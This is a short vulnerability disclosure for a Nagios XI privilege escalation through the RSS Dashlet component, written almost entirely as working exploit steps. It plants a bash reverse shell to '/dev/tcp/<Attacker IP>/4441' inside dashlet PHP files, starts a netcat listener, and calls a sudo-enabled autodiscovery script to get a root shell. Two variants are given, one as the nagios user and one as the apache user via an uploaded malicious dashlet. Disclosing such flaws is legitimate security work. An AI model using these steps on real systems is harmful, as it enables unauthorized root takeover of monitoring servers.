CVE Discovered by: K. Wahab (Neo`X)

Vulnerability Details:


RSS Dashlet is used in this example.

1. Create a new instance of Nagios XI:

2. Privilege Escalation:

Exploit As NAGIOS:

  • Add inside dashlet .inc.php file in "/usr/local/nagiosxi/html/includes/dashlets/" the following content :
exec('/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1);
  • Start a Netcat listening server on the attacker machine:
nc -nlvp 4441
  • Execute the following command to escalate privileges and receive a connection as root:
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=

Exploit As APACHE:

  • Go on the "dashlets" managing page and download a Dashlet:

  • Modify the *.inc.php:

    exec("sleep 30 && /bin/bash -c '/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1'");


  • Start a Netcat listening server on the attacker machine:
nc -nlvp 4441
  • Upload the malicious dashlet in the dashlets managing page and wait for connection as APACHE user.
  • Execute the following command to escalate privileges and receive a connection as root:
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=

(Note : After executing the command you will receive connection as APACHE, use CTRL+C to exit and restart listener again multiple times)
